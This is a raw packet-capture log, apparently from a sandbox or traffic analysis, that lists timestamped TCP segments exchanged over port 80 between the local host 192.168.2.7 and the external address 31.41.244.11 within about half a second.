Dec 13, 2024 18:53:30.238023996 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238035917 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238054037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238054037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238075972 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238754988 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238773108 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238795996 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238809109 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238810062 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238814116 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238832951 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.238837004 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238852024 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.238868952 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.239583969 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.239602089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.239641905 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.239675045 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.240413904 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.240432024 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.240447044 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.240466118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.240499020 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.240499020 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.241152048 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.241169930 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.241188049 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.241204023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.241264105 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.241312027 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.241832018 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.241877079 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.241915941 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.241996050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.242032051 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.242750883 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.242788076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.357563972 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.357630014 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.357736111 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.357784986 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.361741066 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.361793041 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.361843109 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.361888885 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.370282888 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.370340109 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.370388985 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.370440960 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.378595114 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.378685951 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.378726006 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.378798008 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.386368036 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.386455059 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.386486053 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.386555910 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.393786907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.393870115 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.393872976 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.393925905 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.401351929 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.401424885 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.401484966 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.401601076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.408984900 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.409041882 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.409064054 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.409097910 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.416091919 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.416157007 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.416254044 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.416311026 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.423572063 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.423631907 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.423711061 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.423763037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.431022882 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.431096077 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.431164026 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.431217909 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.438467026 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.438522100 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.438532114 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.438570976 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.445903063 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.445962906 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.446038008 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.446090937 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.453370094 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.453433037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.453576088 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.453639030 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.460971117 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.461038113 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.461093903 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.461144924 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.468214035 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.468276024 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.468350887 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.468401909 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.475651026 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.475713968 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.475800991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.475856066 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.483093023 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.483149052 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.483253956 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.483297110 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.490562916 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.490623951 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.490637064 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.490688086 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.497960091 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.498076916 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.501666069 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.501843929 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.501868010 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.501900911 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.509156942 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.509268045 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.509295940 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.509361982 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.516563892 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.516623020 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.516695976 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.516747952 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.524949074 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.524987936 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.525010109 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.525041103 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.531703949 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.531764030 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.531840086 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.531892061 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.538870096 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.538924932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.539120913 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.539177895 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.546484947 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.546576977 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.546631098 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.546719074 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.555612087 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.555656910 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.555702925 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.555702925 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.562549114 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.562613964 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.562705040 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.562772989 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.569930077 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.569989920 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.570067883 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.570120096 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.577482939 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.577543974 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.577636957 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.577688932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.584919930 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.584956884 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.584994078 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.585030079 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.591000080 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.591082096 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.591103077 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.591160059 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.598413944 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.598484993 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.598529100 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.598596096 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.607073069 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.607244015 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.607251883 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.607310057 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.614485979 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.614553928 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.614784956 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.614842892 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.621649981 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.621710062 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.621808052 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.621864080 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.628521919 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.628586054 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.628675938 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.628731966 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.633820057 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.633884907 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.635175943 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.635234118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.635276079 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.635334969 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.637891054 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.637960911 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.637994051 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.638051987 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.640625954 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.640685081 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.640815020 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.640872002 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.643449068 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.643523932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.643531084 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.643584013 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.645945072 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.646007061 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.646058083 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.646112919 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.648415089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.648524046 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.648530006 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.648578882 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.650999069 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.651057005 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.651123047 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.651185989 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.653685093 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.653748989 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.653837919 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.653901100 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.656282902 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.656341076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.656414986 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.656467915 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.658907890 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.659054995 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.659177065 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.661478043 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.661533117 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.661607027 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.661667109 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.664046049 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.664119005 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.664191008 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.664252043 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.666722059 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.666783094 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.666830063 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.666892052 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.669214010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.669361115 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.669369936 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.669425011 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.671730042 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.671806097 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.671902895 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.671966076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.674267054 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.674351931 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.674376965 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.674454927 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.676889896 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.676959991 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.677129030 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.677191019 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.679615974 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.679691076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.679752111 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.679811001 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.682007074 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.682071924 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.682167053 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.682342052 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.684386969 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.684454918 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.684545040 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.684603930 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.687002897 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.687063932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.687120914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.687174082 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.690119028 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.690180063 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.690265894 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.690320015 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.692061901 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.692118883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.692241907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.692306995 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.697407961 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.697489023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.697727919 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.697787046 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.698671103 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.698736906 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.698774099 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.698826075 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.705111027 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.705180883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.705204010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.705259085 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.706269979 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.706331015 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.706384897 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.706442118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.711369991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.711442947 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.711468935 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.711524963 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.712430954 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.712483883 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.712503910 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.712532997 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.718375921 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.718453884 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.718496084 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.718550920 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.719623089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.719728947 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.719734907 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.719783068 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.727029085 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.727102041 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.727154970 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.727212906 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.728374958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.728435993 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.728468895 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.728524923 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.734365940 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.734431028 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.734519958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.734570026 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.735688925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.735745907 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.735806942 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.735862017 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.741691113 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.741754055 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.741808891 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.741883039 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.742983103 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.743041039 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.743149042 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.743204117 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.748631001 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.748687029 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.748703957 CET	49864	80	192.168.2.7	31.41.244.11
